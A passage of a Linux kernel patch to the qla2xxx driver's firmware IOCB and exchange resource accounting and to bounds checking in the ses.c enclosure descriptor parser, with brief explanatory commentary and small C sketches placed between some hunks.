+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+diff --git a/drivers/scsi/qla2xxx/qla_edif_bsg.h b/drivers/scsi/qla2xxx/qla_edif_bsg.h
+index 0931f4e4e127a..514c265ba86e2 100644
+--- a/drivers/scsi/qla2xxx/qla_edif_bsg.h
++++ b/drivers/scsi/qla2xxx/qla_edif_bsg.h
+@@ -89,7 +89,20 @@ struct app_plogi_reply {
+ struct app_pinfo_req {
+ 	struct app_id app_info;
+ 	uint8_t	 num_ports;
+-	port_id_t remote_pid;
++	struct {
++#ifdef __BIG_ENDIAN
++		uint8_t domain;
++		uint8_t area;
++		uint8_t al_pa;
++#elif defined(__LITTLE_ENDIAN)
++		uint8_t al_pa;
++		uint8_t area;
++		uint8_t domain;
++#else
++#error "__BIG_ENDIAN or __LITTLE_ENDIAN must be defined!"
++#endif
++		uint8_t rsvd_1;
++	} remote_pid;
+ 	uint8_t		version;
+ 	uint8_t		pad[VND_CMD_PAD_SIZE];
+ 	uint8_t		reserved[VND_CMD_APP_RESERVED_SIZE];
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 432f47fc5e1f3..a8d822c4e3bac 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -128,12 +128,14 @@ static void qla24xx_abort_iocb_timeout(void *data)
+ 		    sp->cmd_sp)) {
+ 			qpair->req->outstanding_cmds[handle] = NULL;
+ 			cmdsp_found = 1;
++			qla_put_fw_resources(qpair, &sp->cmd_sp->iores);
+ 		}
+ 
+ 		/* removing the abort */
+ 		if (qpair->req->outstanding_cmds[handle] == sp) {
+ 			qpair->req->outstanding_cmds[handle] = NULL;
+ 			sp_found = 1;
++			qla_put_fw_resources(qpair, &sp->iores);
+ 			break;
+ 		}
+ 	}
+@@ -2000,6 +2002,7 @@ qla2x00_tmf_iocb_timeout(void *data)
+ 		for (h = 1; h < sp->qpair->req->num_outstanding_cmds; h++) {
+ 			if (sp->qpair->req->outstanding_cmds[h] == sp) {
+ 				sp->qpair->req->outstanding_cmds[h] = NULL;
++				qla_put_fw_resources(sp->qpair, &sp->iores);
+ 				break;
+ 			}
+ 		}
+@@ -2073,7 +2076,6 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint32_t lun,
+ done_free_sp:
+ 	/* ref: INIT */
+ 	kref_put(&sp->cmd_kref, qla2x00_sp_release);
+-	fcport->flags &= ~FCF_ASYNC_SENT;
+ done:
+ 	return rval;
+ }
+@@ -3943,6 +3945,12 @@ void qla_init_iocb_limit(scsi_qla_host_t *vha)
+ 	ha->base_qpair->fwres.iocbs_limit = limit;
+ 	ha->base_qpair->fwres.iocbs_qp_limit = limit / num_qps;
+ 	ha->base_qpair->fwres.iocbs_used = 0;
++
++	ha->base_qpair->fwres.exch_total = ha->orig_fw_xcb_count;
++	ha->base_qpair->fwres.exch_limit = (ha->orig_fw_xcb_count *
++					    QLA_IOCB_PCT_LIMIT) / 100;
++	ha->base_qpair->fwres.exch_used  = 0;
++
+ 	for (i = 0; i < ha->max_qpairs; i++) {
+ 		if (ha->queue_pair_map[i])  {
+ 			ha->queue_pair_map[i]->fwres.iocbs_total =
+@@ -3951,6 +3959,10 @@ void qla_init_iocb_limit(scsi_qla_host_t *vha)
+ 			ha->queue_pair_map[i]->fwres.iocbs_qp_limit =
+ 				limit / num_qps;
+ 			ha->queue_pair_map[i]->fwres.iocbs_used = 0;
++			ha->queue_pair_map[i]->fwres.exch_total = ha->orig_fw_xcb_count;
++			ha->queue_pair_map[i]->fwres.exch_limit =
++				(ha->orig_fw_xcb_count * QLA_IOCB_PCT_LIMIT) / 100;
++			ha->queue_pair_map[i]->fwres.exch_used = 0;
+ 		}
+ 	}
+ }
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index 5185dc5daf80d..b0ee307b5d4b9 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -380,24 +380,26 @@ qla2xxx_get_fc4_priority(struct scsi_qla_host *vha)
+ 
+ enum {
+ 	RESOURCE_NONE,
+-	RESOURCE_INI,
++	RESOURCE_IOCB = BIT_0,
++	RESOURCE_EXCH = BIT_1,  /* exchange */
++	RESOURCE_FORCE = BIT_2,
+ };
+ 
+ static inline int
+-qla_get_iocbs(struct qla_qpair *qp, struct iocb_resource *iores)
++qla_get_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ {
+ 	u16 iocbs_used, i;
++	u16 exch_used;
+ 	struct qla_hw_data *ha = qp->vha->hw;
+ 
+ 	if (!ql2xenforce_iocb_limit) {
+ 		iores->res_type = RESOURCE_NONE;
+ 		return 0;
+ 	}
++	if (iores->res_type & RESOURCE_FORCE)
++		goto force;
+ 
+-	if ((iores->iocb_cnt + qp->fwres.iocbs_used) < qp->fwres.iocbs_qp_limit) {
+-		qp->fwres.iocbs_used += iores->iocb_cnt;
+-		return 0;
+-	} else {
++	if ((iores->iocb_cnt + qp->fwres.iocbs_used) >= qp->fwres.iocbs_qp_limit) {
+ 		/* no need to acquire qpair lock. It's just rough calculation */
+ 		iocbs_used = ha->base_qpair->fwres.iocbs_used;
+ 		for (i = 0; i < ha->max_qpairs; i++) {
+@@ -405,30 +407,49 @@ qla_get_iocbs(struct qla_qpair *qp, struct iocb_resource *iores)
+ 				iocbs_used += ha->queue_pair_map[i]->fwres.iocbs_used;
+ 		}
+ 
+-		if ((iores->iocb_cnt + iocbs_used) < qp->fwres.iocbs_limit) {
+-			qp->fwres.iocbs_used += iores->iocb_cnt;
+-			return 0;
+-		} else {
++		if ((iores->iocb_cnt + iocbs_used) >= qp->fwres.iocbs_limit) {
++			iores->res_type = RESOURCE_NONE;
++			return -ENOSPC;
++		}
++	}
++
++	if (iores->res_type & RESOURCE_EXCH) {
++		exch_used = ha->base_qpair->fwres.exch_used;
++		for (i = 0; i < ha->max_qpairs; i++) {
++			if (ha->queue_pair_map[i])
++				exch_used += ha->queue_pair_map[i]->fwres.exch_used;
++		}
++
++		if ((exch_used + iores->exch_cnt) >= qp->fwres.exch_limit) {
+ 			iores->res_type = RESOURCE_NONE;
+ 			return -ENOSPC;
+ 		}
+ 	}
++force:
++	qp->fwres.iocbs_used += iores->iocb_cnt;
++	qp->fwres.exch_used += iores->exch_cnt;
++	return 0;
+ }
+ 
+ static inline void
+-qla_put_iocbs(struct qla_qpair *qp, struct iocb_resource *iores)
++qla_put_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ {
+-	switch (iores->res_type) {
+-	case RESOURCE_NONE:
+-		break;
+-	default:
++	if (iores->res_type & RESOURCE_IOCB) {
+ 		if (qp->fwres.iocbs_used >= iores->iocb_cnt) {
+ 			qp->fwres.iocbs_used -= iores->iocb_cnt;
+ 		} else {
+-			// should not happen
++			/* should not happen */
+ 			qp->fwres.iocbs_used = 0;
+ 		}
+-		break;
++	}
++
++	if (iores->res_type & RESOURCE_EXCH) {
++		if (qp->fwres.exch_used >= iores->exch_cnt) {
++			qp->fwres.exch_used -= iores->exch_cnt;
++		} else {
++			/* should not happen */
++			qp->fwres.exch_used = 0;
++		}
+ 	}
+ 	iores->res_type = RESOURCE_NONE;
+ }
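The qla_inline.h rework turns the single RESOURCE_INI tag into independent bitflags so IOCB slots and exchanges are budgeted separately, with RESOURCE_FORCE bypassing the limits; the release side clamps rather than underflows. A plain-C model of that acquire/release accounting (limits and names are illustrative, not the driver's values):

#include <errno.h>
#include <stdio.h>

#define RES_IOCB  (1u << 0)
#define RES_EXCH  (1u << 1)
#define RES_FORCE (1u << 2)

struct fw_resources {
    unsigned int iocbs_used, iocbs_limit;
    unsigned int exch_used, exch_limit;
};

struct io_res {
    unsigned int type, iocb_cnt, exch_cnt;
};

static int get_res(struct fw_resources *fw, struct io_res *r)
{
    if (!(r->type & RES_FORCE)) {
        if ((r->type & RES_IOCB) &&
            fw->iocbs_used + r->iocb_cnt >= fw->iocbs_limit)
            goto nospc;
        if ((r->type & RES_EXCH) &&
            fw->exch_used + r->exch_cnt >= fw->exch_limit)
            goto nospc;
    }
    fw->iocbs_used += r->iocb_cnt;
    fw->exch_used += r->exch_cnt;
    return 0;
nospc:
    r->type = 0;
    return -ENOSPC;
}

static void put_res(struct fw_resources *fw, struct io_res *r)
{
    /* Clamp to zero instead of underflowing on a double put. */
    if (r->type & RES_IOCB)
        fw->iocbs_used -= r->iocb_cnt <= fw->iocbs_used ?
                          r->iocb_cnt : fw->iocbs_used;
    if (r->type & RES_EXCH)
        fw->exch_used -= r->exch_cnt <= fw->exch_used ?
                         r->exch_cnt : fw->exch_used;
    r->type = 0;
}

int main(void)
{
    struct fw_resources fw = { 0, 8, 0, 4 };
    struct io_res r = { RES_IOCB | RES_EXCH, 3, 1 };

    printf("get -> %d (iocbs=%u exch=%u)\n",
           get_res(&fw, &r), fw.iocbs_used, fw.exch_used);
    put_res(&fw, &r);
    printf("put    (iocbs=%u exch=%u)\n", fw.iocbs_used, fw.exch_used);
    return 0;
}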
+diff --git a/drivers/scsi/qla2xxx/qla_iocb.c b/drivers/scsi/qla2xxx/qla_iocb.c
+index 42ce4e1fe7441..4f48f098ea5a6 100644
+--- a/drivers/scsi/qla2xxx/qla_iocb.c
++++ b/drivers/scsi/qla2xxx/qla_iocb.c
+@@ -1589,9 +1589,10 @@ qla24xx_start_scsi(srb_t *sp)
+ 	tot_dsds = nseg;
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = req_cnt;
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -1678,7 +1679,7 @@ queuing_error:
+ 	if (tot_dsds)
+ 		scsi_dma_unmap(cmd);
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -1793,9 +1794,10 @@ qla24xx_dif_start_scsi(srb_t *sp)
+ 	tot_prot_dsds = nseg;
+ 	tot_dsds += nseg;
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -1883,7 +1885,7 @@ queuing_error:
+ 	}
+ 	/* Cleanup will be performed by the caller (queuecommand) */
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -1952,9 +1954,10 @@ qla2xxx_start_scsi_mq(srb_t *sp)
+ 	tot_dsds = nseg;
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = req_cnt;
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -2041,7 +2044,7 @@ queuing_error:
+ 	if (tot_dsds)
+ 		scsi_dma_unmap(cmd);
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&qpair->qp_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -2171,9 +2174,10 @@ qla2xxx_dif_start_scsi_mq(srb_t *sp)
+ 	tot_prot_dsds = nseg;
+ 	tot_dsds += nseg;
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -2260,7 +2264,7 @@ queuing_error:
+ 	}
+ 	/* Cleanup will be performed by the caller (queuecommand) */
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&qpair->qp_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -3813,6 +3817,65 @@ qla24xx_prlo_iocb(srb_t *sp, struct logio_entry_24xx *logio)
+ 	logio->vp_index = sp->fcport->vha->vp_idx;
+ }
+ 
++int qla_get_iocbs_resource(struct srb *sp)
++{
++	bool get_exch;
++	bool push_it_through = false;
++
++	if (!ql2xenforce_iocb_limit) {
++		sp->iores.res_type = RESOURCE_NONE;
++		return 0;
++	}
++	sp->iores.res_type = RESOURCE_NONE;
++
++	switch (sp->type) {
++	case SRB_TM_CMD:
++	case SRB_PRLI_CMD:
++	case SRB_ADISC_CMD:
++		push_it_through = true;
++		fallthrough;
++	case SRB_LOGIN_CMD:
++	case SRB_ELS_CMD_RPT:
++	case SRB_ELS_CMD_HST:
++	case SRB_ELS_CMD_HST_NOLOGIN:
++	case SRB_CT_CMD:
++	case SRB_NVME_LS:
++	case SRB_ELS_DCMD:
++		get_exch = true;
++		break;
++
++	case SRB_FXIOCB_DCMD:
++	case SRB_FXIOCB_BCMD:
++		sp->iores.res_type = RESOURCE_NONE;
++		return 0;
++
++	case SRB_SA_UPDATE:
++	case SRB_SA_REPLACE:
++	case SRB_MB_IOCB:
++	case SRB_ABT_CMD:
++	case SRB_NACK_PLOGI:
++	case SRB_NACK_PRLI:
++	case SRB_NACK_LOGO:
++	case SRB_LOGOUT_CMD:
++	case SRB_CTRL_VP:
++		push_it_through = true;
++		fallthrough;
++	default:
++		get_exch = false;
++	}
++
++	sp->iores.res_type |= RESOURCE_IOCB;
++	sp->iores.iocb_cnt = 1;
++	if (get_exch) {
++		sp->iores.res_type |= RESOURCE_EXCH;
++		sp->iores.exch_cnt = 1;
++	}
++	if (push_it_through)
++		sp->iores.res_type |= RESOURCE_FORCE;
++
++	return qla_get_fw_resources(sp->qpair, &sp->iores);
++}
++
+ int
+ qla2x00_start_sp(srb_t *sp)
+ {
+@@ -3827,6 +3890,12 @@ qla2x00_start_sp(srb_t *sp)
+ 		return -EIO;
+ 
+ 	spin_lock_irqsave(qp->qp_lock_ptr, flags);
++	rval = qla_get_iocbs_resource(sp);
++	if (rval) {
++		spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
++		return -EAGAIN;
++	}
++
+ 	pkt = __qla2x00_alloc_iocbs(sp->qpair, sp);
+ 	if (!pkt) {
+ 		rval = EAGAIN;
+@@ -3927,6 +3996,8 @@ qla2x00_start_sp(srb_t *sp)
+ 	wmb();
+ 	qla2x00_start_iocbs(vha, qp->req);
+ done:
++	if (rval)
++		qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
+ 	return rval;
+ }
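
The new qla_get_iocbs_resource() above classifies each srb type with a switch in which the "must go through" cases set a force flag and then fall through into the group that also consumes an exchange, so the two properties compose without duplicating case lists. A compact sketch of the same trick, with invented command names:

	enum cmd { CMD_TMF, CMD_LOGIN, CMD_MBX, CMD_IO };

	static unsigned int classify(enum cmd c)
	{
		unsigned int flags = 1 << 0;	/* every command costs an IOCB */

		switch (c) {
		case CMD_TMF:			/* must never be throttled ... */
			flags |= 1 << 2;	/* ... so force it through */
			__attribute__((fallthrough));
		case CMD_LOGIN:			/* fabric commands also ... */
			flags |= 1 << 1;	/* ... consume an exchange */
			break;
		case CMD_MBX:
			flags |= 1 << 2;	/* forced, but no exchange */
			break;
		default:
			break;			/* plain IOCB-only command */
		}
		return flags;
	}
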
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index e19fde304e5c6..cbbd7014da939 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -3112,6 +3112,7 @@ qla25xx_process_bidir_status_iocb(scsi_qla_host_t *vha, void *pkt,
+ 	}
+ 	bsg_reply->reply_payload_rcv_len = 0;
+ 
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ done:
+ 	/* Return the vendor specific reply to API */
+ 	bsg_reply->reply_data.vendor_reply.vendor_rsp[0] = rval;
+@@ -3197,7 +3198,7 @@ qla2x00_status_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, void *pkt)
+ 		}
+ 		return;
+ 	}
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 
+ 	if (sp->cmd_type != TYPE_SRB) {
+ 		req->outstanding_cmds[handle] = NULL;
+@@ -3362,8 +3363,6 @@ qla2x00_status_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, void *pkt)
+ 				       "Dropped frame(s) detected (0x%x of 0x%x bytes).\n",
+ 				       resid, scsi_bufflen(cp));
+ 
+-				vha->interface_err_cnt++;
+-
+ 				res = DID_ERROR << 16 | lscsi_status;
+ 				goto check_scsi_status;
+ 			}
+@@ -3618,7 +3617,6 @@ qla2x00_error_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, sts_entry_t *pkt)
+ 	default:
+ 		sp = qla2x00_get_sp_from_handle(vha, func, req, pkt);
+ 		if (sp) {
+-			qla_put_iocbs(sp->qpair, &sp->iores);
+ 			sp->done(sp, res);
+ 			return 0;
+ 		}
+diff --git a/drivers/scsi/qla2xxx/qla_nvme.c b/drivers/scsi/qla2xxx/qla_nvme.c
+index 02fdeb0d31ec4..c57e02a355219 100644
+--- a/drivers/scsi/qla2xxx/qla_nvme.c
++++ b/drivers/scsi/qla2xxx/qla_nvme.c
+@@ -170,18 +170,6 @@ out:
+ 	qla2xxx_rel_qpair_sp(sp->qpair, sp);
+ }
+ 
+-static void qla_nvme_ls_unmap(struct srb *sp, struct nvmefc_ls_req *fd)
+-{
+-	if (sp->flags & SRB_DMA_VALID) {
+-		struct srb_iocb *nvme = &sp->u.iocb_cmd;
+-		struct qla_hw_data *ha = sp->fcport->vha->hw;
+-
+-		dma_unmap_single(&ha->pdev->dev, nvme->u.nvme.cmd_dma,
+-				 fd->rqstlen, DMA_TO_DEVICE);
+-		sp->flags &= ~SRB_DMA_VALID;
+-	}
+-}
+-
+ static void qla_nvme_release_ls_cmd_kref(struct kref *kref)
+ {
+ 	struct srb *sp = container_of(kref, struct srb, cmd_kref);
+@@ -199,7 +187,6 @@ static void qla_nvme_release_ls_cmd_kref(struct kref *kref)
+ 
+ 	fd = priv->fd;
+ 
+-	qla_nvme_ls_unmap(sp, fd);
+ 	fd->done(fd, priv->comp_status);
+ out:
+ 	qla2x00_rel_sp(sp);
+@@ -365,13 +352,10 @@ static int qla_nvme_ls_req(struct nvme_fc_local_port *lport,
+ 	nvme->u.nvme.rsp_len = fd->rsplen;
+ 	nvme->u.nvme.rsp_dma = fd->rspdma;
+ 	nvme->u.nvme.timeout_sec = fd->timeout;
+-	nvme->u.nvme.cmd_dma = dma_map_single(&ha->pdev->dev, fd->rqstaddr,
+-	    fd->rqstlen, DMA_TO_DEVICE);
++	nvme->u.nvme.cmd_dma = fd->rqstdma;
+ 	dma_sync_single_for_device(&ha->pdev->dev, nvme->u.nvme.cmd_dma,
+ 	    fd->rqstlen, DMA_TO_DEVICE);
+ 
+-	sp->flags |= SRB_DMA_VALID;
+-
+ 	rval = qla2x00_start_sp(sp);
+ 	if (rval != QLA_SUCCESS) {
+ 		ql_log(ql_log_warn, vha, 0x700e,
+@@ -379,7 +363,6 @@ static int qla_nvme_ls_req(struct nvme_fc_local_port *lport,
+ 		wake_up(&sp->nvme_ls_waitq);
+ 		sp->priv = NULL;
+ 		priv->sp = NULL;
+-		qla_nvme_ls_unmap(sp, fd);
+ 		qla2x00_rel_sp(sp);
+ 		return rval;
+ 	}
+@@ -445,13 +428,24 @@ static inline int qla2x00_start_nvme_mq(srb_t *sp)
+ 		goto queuing_error;
+ 	}
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
++
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
++	sp->iores.iocb_cnt = req_cnt;
++	if (qla_get_fw_resources(sp->qpair, &sp->iores)) {
++		rval = -EBUSY;
++		goto queuing_error;
++	}
++
+ 	if (req->cnt < (req_cnt + 2)) {
+ 		if (IS_SHADOW_REG_CAPABLE(ha)) {
+ 			cnt = *req->out_ptr;
+ 		} else {
+ 			cnt = rd_reg_dword_relaxed(req->req_q_out);
+-			if (qla2x00_check_reg16_for_disconnect(vha, cnt))
++			if (qla2x00_check_reg16_for_disconnect(vha, cnt)) {
++				rval = -EBUSY;
+ 				goto queuing_error;
++			}
+ 		}
+ 
+ 		if (req->ring_index < cnt)
+@@ -600,6 +594,8 @@ static inline int qla2x00_start_nvme_mq(srb_t *sp)
+ 		qla24xx_process_response_queue(vha, rsp);
+ 
+ queuing_error:
++	if (rval)
++		qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&qpair->qp_lock, flags);
+ 
+ 	return rval;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 96ba1398f20c1..6e33dc16ce6f3 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -7095,9 +7095,12 @@ qla2x00_do_dpc(void *data)
+ 			}
+ 		}
+ loop_resync_check:
+-		if (test_and_clear_bit(LOOP_RESYNC_NEEDED,
++		if (!qla2x00_reset_active(base_vha) &&
++		    test_and_clear_bit(LOOP_RESYNC_NEEDED,
+ 		    &base_vha->dpc_flags)) {
+-
++			/*
++			 * Allow abort_isp to complete before moving on to scanning.
++			 */
+ 			ql_dbg(ql_dbg_dpc, base_vha, 0x400f,
+ 			    "Loop resync scheduled.\n");
+ 
+@@ -7448,7 +7451,7 @@ qla2x00_timer(struct timer_list *t)
+ 
+ 		/* if the loop has been down for 4 minutes, reinit adapter */
+ 		if (atomic_dec_and_test(&vha->loop_down_timer) != 0) {
+-			if (!(vha->device_flags & DFLG_NO_CABLE)) {
++			if (!(vha->device_flags & DFLG_NO_CABLE) && !vha->vp_idx) {
+ 				ql_log(ql_log_warn, vha, 0x6009,
+ 				    "Loop down - aborting ISP.\n");
+ 
+diff --git a/drivers/scsi/ses.c b/drivers/scsi/ses.c
+index 0a1734f34587d..1707d6d144d21 100644
+--- a/drivers/scsi/ses.c
++++ b/drivers/scsi/ses.c
+@@ -433,8 +433,8 @@ int ses_match_host(struct enclosure_device *edev, void *data)
+ }
+ #endif  /*  0  */
+ 
+-static void ses_process_descriptor(struct enclosure_component *ecomp,
+-				   unsigned char *desc)
++static int ses_process_descriptor(struct enclosure_component *ecomp,
++				   unsigned char *desc, int max_desc_len)
+ {
+ 	int eip = desc[0] & 0x10;
+ 	int invalid = desc[0] & 0x80;
+@@ -445,22 +445,32 @@ static void ses_process_descriptor(struct enclosure_component *ecomp,
+ 	unsigned char *d;
+ 
+ 	if (invalid)
+-		return;
++		return 0;
+ 
+ 	switch (proto) {
+ 	case SCSI_PROTOCOL_FCP:
+ 		if (eip) {
++			if (max_desc_len <= 7)
++				return 1;
+ 			d = desc + 4;
+ 			slot = d[3];
+ 		}
+ 		break;
+ 	case SCSI_PROTOCOL_SAS:
++
+ 		if (eip) {
++			if (max_desc_len <= 27)
++				return 1;
+ 			d = desc + 4;
+ 			slot = d[3];
+ 			d = desc + 8;
+-		} else
++		} else {
++			if (max_desc_len <= 23)
++				return 1;
+ 			d = desc + 4;
++		}
++
++
+ 		/* only take the phy0 addr */
+ 		addr = (u64)d[12] << 56 |
+ 			(u64)d[13] << 48 |
+@@ -477,6 +487,8 @@ static void ses_process_descriptor(struct enclosure_component *ecomp,
+ 	}
+ 	ecomp->slot = slot;
+ 	scomp->addr = addr;
++
++	return 0;
+ }
+ 
+ struct efd {
+@@ -549,7 +561,7 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 		/* skip past overall descriptor */
+ 		desc_ptr += len + 4;
+ 	}
+-	if (ses_dev->page10)
++	if (ses_dev->page10 && ses_dev->page10_len > 9)
+ 		addl_desc_ptr = ses_dev->page10 + 8;
+ 	type_ptr = ses_dev->page1_types;
+ 	components = 0;
+@@ -557,17 +569,22 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 		for (j = 0; j < type_ptr[1]; j++) {
+ 			char *name = NULL;
+ 			struct enclosure_component *ecomp;
++			int max_desc_len;
+ 
+ 			if (desc_ptr) {
+-				if (desc_ptr >= buf + page7_len) {
++				if (desc_ptr + 3 >= buf + page7_len) {
+ 					desc_ptr = NULL;
+ 				} else {
+ 					len = (desc_ptr[2] << 8) + desc_ptr[3];
+ 					desc_ptr += 4;
+-					/* Add trailing zero - pushes into
+-					 * reserved space */
+-					desc_ptr[len] = '\0';
+-					name = desc_ptr;
++					if (desc_ptr + len > buf + page7_len)
++						desc_ptr = NULL;
++					else {
++						/* Add trailing zero - pushes into
++						 * reserved space */
++						desc_ptr[len] = '\0';
++						name = desc_ptr;
++					}
+ 				}
+ 			}
+ 			if (type_ptr[0] == ENCLOSURE_COMPONENT_DEVICE ||
+@@ -583,10 +600,14 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 					ecomp = &edev->component[components++];
+ 
+ 				if (!IS_ERR(ecomp)) {
+-					if (addl_desc_ptr)
+-						ses_process_descriptor(
+-							ecomp,
+-							addl_desc_ptr);
++					if (addl_desc_ptr) {
++						max_desc_len = ses_dev->page10_len -
++						    (addl_desc_ptr - ses_dev->page10);
++						if (ses_process_descriptor(ecomp,
++						    addl_desc_ptr,
++						    max_desc_len))
++							addl_desc_ptr = NULL;
++					}
+ 					if (create)
+ 						enclosure_component_register(
+ 							ecomp);
+@@ -603,9 +624,11 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 			     /* these elements are optional */
+ 			     type_ptr[0] == ENCLOSURE_COMPONENT_SCSI_TARGET_PORT ||
+ 			     type_ptr[0] == ENCLOSURE_COMPONENT_SCSI_INITIATOR_PORT ||
+-			     type_ptr[0] == ENCLOSURE_COMPONENT_CONTROLLER_ELECTRONICS))
++			     type_ptr[0] == ENCLOSURE_COMPONENT_CONTROLLER_ELECTRONICS)) {
+ 				addl_desc_ptr += addl_desc_ptr[1] + 2;
+-
++				if (addl_desc_ptr + 1 >= ses_dev->page10 + ses_dev->page10_len)
++					addl_desc_ptr = NULL;
++			}
+ 		}
+ 	}
+ 	kfree(buf);
+@@ -704,6 +727,12 @@ static int ses_intf_add(struct device *cdev,
+ 		    type_ptr[0] == ENCLOSURE_COMPONENT_ARRAY_DEVICE)
+ 			components += type_ptr[1];
+ 	}
++
++	if (components == 0) {
++		sdev_printk(KERN_WARNING, sdev, "enclosure has no enumerated components\n");
++		goto err_free;
++	}
++
+ 	ses_dev->page1 = buf;
+ 	ses_dev->page1_len = len;
+ 	buf = NULL;
+@@ -827,7 +856,8 @@ static void ses_intf_remove_enclosure(struct scsi_device *sdev)
+ 	kfree(ses_dev->page2);
+ 	kfree(ses_dev);
+ 
+-	kfree(edev->component[0].scratch);
++	if (edev->components)
++		kfree(edev->component[0].scratch);
+ 
+ 	put_device(&edev->edev);
+ 	enclosure_unregister(edev);
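
The ses.c changes all follow one rule: never dereference a descriptor until both its 4-byte header and its claimed length are known to fit inside the page the enclosure returned, and stop walking the moment a bound is crossed rather than trusting the device's counts. A minimal sketch of that walk, assuming the same big-endian 16-bit length at offset 2:

	#include <stddef.h>

	static int walk_descriptors(const unsigned char *buf, size_t buf_len)
	{
		size_t off = 0;

		while (off + 4 <= buf_len) {		/* header fits? */
			size_t len = (buf[off + 2] << 8) | buf[off + 3];

			if (off + 4 + len > buf_len)	/* payload fits? */
				return -1;		/* truncated page */
			/* ... process buf[off + 4 .. off + 4 + len) ... */
			off += 4 + len;
		}
		return 0;
	}
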
+diff --git a/drivers/scsi/snic/snic_debugfs.c b/drivers/scsi/snic/snic_debugfs.c
+index 57bdc3ba49d9c..9dd975b36b5bd 100644
+--- a/drivers/scsi/snic/snic_debugfs.c
++++ b/drivers/scsi/snic/snic_debugfs.c
+@@ -437,6 +437,6 @@ void snic_trc_debugfs_init(void)
+ void
+ snic_trc_debugfs_term(void)
+ {
+-	debugfs_remove(debugfs_lookup(TRC_FILE, snic_glob->trc_root));
+-	debugfs_remove(debugfs_lookup(TRC_ENABLE_FILE, snic_glob->trc_root));
++	debugfs_lookup_and_remove(TRC_FILE, snic_glob->trc_root);
